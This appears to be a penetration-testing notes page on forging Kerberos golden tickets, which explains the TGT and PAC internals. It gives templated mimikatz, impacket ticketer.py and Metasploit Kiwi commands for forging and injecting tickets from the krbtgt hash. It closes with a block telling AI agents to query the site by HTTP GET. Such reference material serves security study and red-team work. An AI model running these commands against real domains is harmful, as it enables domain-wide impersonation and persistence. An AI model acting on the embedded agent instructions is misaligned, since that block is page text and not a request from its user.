# Post Exploitation - Kerberos golden tickets

### Overview

`Kerberos` is an authentication protocol, used within Active Directory that rely on the use of tickets to identify users and grant access to domain resources. `Kerberos` implements two type of tickets, issued by two distinct services of the `Key Distribution Center (KDC)`:

* `Ticket-Granting Ticket (TGT)`, obtained from the `Authentication Service (AS)`
* `service tickets`, obtained from the `Ticket-Granting Service (TGS)`.

A `TGT` is generally requested by an user through a `KRB_AS_REQ` request to the `AS` of the `KDC` during the login process on a Windows system integrated to an Active Directory domain. `TGTs` are encrypted using one of the secrets (`RC4 key`, whose value is identical to the `NTLM` hash, or `AES 128/256 bits keys`) of the `krbtgt` account of the domain. After reception of the `TGT`, in a `KRB_AS_REP` response from the `KDC`, `TGT` are stored in memory by the client in the `Security Support Provider (SSP) Kerberos` of the `Local Security Authority Server Service (LSASS)` process.

An user authentication data is stored encrypted (using one of the secrets of the `krbtgt` account) in the `Privilege Attribute Certificate (PAC)` of the `TGT` and includes:

* The `Domain SID` and `User RID`, which combination form the user's current `Security Identifier (SID)`
* the user's `SIDs` kept in its `SIDHistory` attribute
* The `GROUP_MEMBERSHIP_ARRAY` which contains the user's group memberships, in the form of the groups `Relative ID (RID)`.

Whenever generating a `service ticket`, the `TGT`'s `PAC` will be decrypted by the `KDC`, signed using both one of the secrets of the `krbtgt` account (`KDC Signature`) and of the targeted service account (`Server Signature`), and ultimately encrypted using one of the secrets the targeted service account.

`Golden tickets` are `TGT` forged with arbitrary authentication data. Indeed, the specified username, groups `RID` and `SIDs` will be added to the forged ticket `PAC`. The `golden ticket` can be injected in the current user session and used to directly request `service tickets` from the `TGS`.

To generate a `golden ticket`, the following prerequisites are needed:

* The fully qualified domain name and the `SID` of the targeted domain.
* One of the secrets of the targeted domain `krbtgt` account. The `krbtgt` `RC4` key, corresponding to the `NTLM hash` of the `krbtgt` password, as well as the `AES 128/256 bits` keys can be used.

Note that while the user account specified for the `golden ticket` must be a member of the targeted domain, the arbitrary SIDs added in the SID history of the forged ticket (`ExtraSids` field of the `PAC`) can come from external domains or forests (for which trusts relationships are configured).

### Golden tickets generation

The `mimikatz` `kerberos::golden` module and `impacket`'s `ticketer.py` can be used to generate `golden tickets`.

The `golden ticket`'s:

* `UserId` (impersonated user's `RID`) can be specified using (`mimikatz`) `/id` / (`ticketer.py`) `-user-id` `<USER_ID>` and defaults to `500`.
* `GroupIds` (impersonated group memberships) can be specified using (`mimikatz`) `/groups` / (`ticketer.py`) `-groups` `<GROUP_RID | GROUP_RID1, ..., GROUP_RIDN>` and defaults to `513, 512, 520, 518, 519`.
* `ExtraSids` (impersonated user's `SID History`) can be specified using (`mimikatz`) `/sids` / (`ticketer.py`) `-extra-sid` `<EXTRA_SID | EXTRA_SID1, ..., EXTRA_SIDN>`.

```
# Retrives the domain SID.
Get-ADDomain | Ft DNSRoot, DomainSID

# [Windows] Golden tickets generation using mimikatz.
# The generated ticket can be directly injected in the current session using the "/ptt" option.
# Otherwise the golden ticket is exported in the KRB_CRED format (KIRBI file on disk).
mimikatz # kerberos::golden /user:<USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> [/rc4:<KRBTGT_NTLM> | /aes128:<KRBTGT_AES128> | /aes256:<KRBTGT_AES256>] [/groups:<RID | RID_LIST>] [/sids:<EXTRA_SID | EXTRA_SIDS_LIST>]

# [Linux / Windows] Golden tickets generation using ticketer.py.
# The generated ticket is exported in the credential cache (ccache) format.
ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> [-nthash <KRBTGT_NTLM> | -aesKey <KRBTGT_AES128 | KRBTGT_AES256>] <USERNAME>
ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> [-nthash <KRBTGT_NTLM> | -aesKey <KRBTGT_AES128 | KRBTGT_AES256>] -user-id <500 | USER_ID> -groups <GROUP_RID | GROUP_RID1, ..., GROUP_RIDN> -extra-sid <EXTRA_SID | EXTRA_SID1, ..., EXTRA_SIDN> <USERNAME>
```

**mimikatz with Metasploit**

`mimikatz` 2.0 is available in a `meterpreter` shell as the `Kiwi` extension.

To following command can be used to load the extension in memory on a `meterpreter` shell: `use kiwi`

Once the module has been loaded, the `golden_ticket_create` command can be used to create a golden ticket:

```
golden_ticket_create -d '<FQDN_DOMAIN>' -s '<SID_DOMAIN>' -k '<KRBTGT_HASH>' -u '<USERNAME>' -t '<FULL_SAVE_PATH>'

Usage: golden_ticket_create [options]
OPTIONS:
    -d <opt>  FQDN of the target domain (required)
    -g <opt>  Comma-separated list of group identifiers to include (eg: 501,502)
    -h        Help banner
    -i <opt>  ID of the user to associate the ticket with
    -k <opt>  krbtgt domain user NTLM hash
    -s <opt>  SID of the domain
    -t <opt>  Local path of the file to store the ticket in (required)
    -u <opt>  Name of the user to create the ticket for (required)
```

Tickets can be loaded/purged using the `kerberos_ticket_use` and `kerberos_ticket_purge` commands:

```
kerberos_ticket_use <FULL_SAVE_PATH>
kerberos_ticket_purge
```

### Golden tickets usage (Pass-the-Ticket)

On Windows, `golden tickets` generated using `mimikatz` will be automatically injected in the current logon session if the `/ptt` option is specified. Otherwise, an exported `golden ticket` can be injected using `mimikatz.exe "kerberos::ptt <TICKET_FILE_PATH>` for example.

On Linux, `golden tickets`, in the `credential cache (ccache)` format can be exported in the `KRB5CCNAME` environment variable for further use through tools supporting the `Kerberos` protocol, such as `Impacket` Python utilities.

Refer to the `[ActiveDirectory] Kerberos tickets usage` for more information on techniques and tools to leverage `golden tickets`.

***

### References

<https://2014.rmll.info/slides/80/day\\_3-1010-Benjamin\\_Delpy-Mimikatz\\_a\\_short\\_journey\\_inside\\_the\\_memory\\_of\\_the\\_Windows\\_Security\\_service.pdf> <https://adsecurity.org/?page\\_id=1821> TECHNIQUES DE PERSISTANCE ACTIVE DIRECTORY BASÉES SUR KERBEROS - MISC Hors-Série N°20 <https://www.beneaththewaves.net/Projects/Mimikatz\\_20\\_-\\_Silver\\_Ticket\\_Walkthrough.html>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.qazeer.io/active-directory/post_exploitation-kerberos_golden_tickets.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.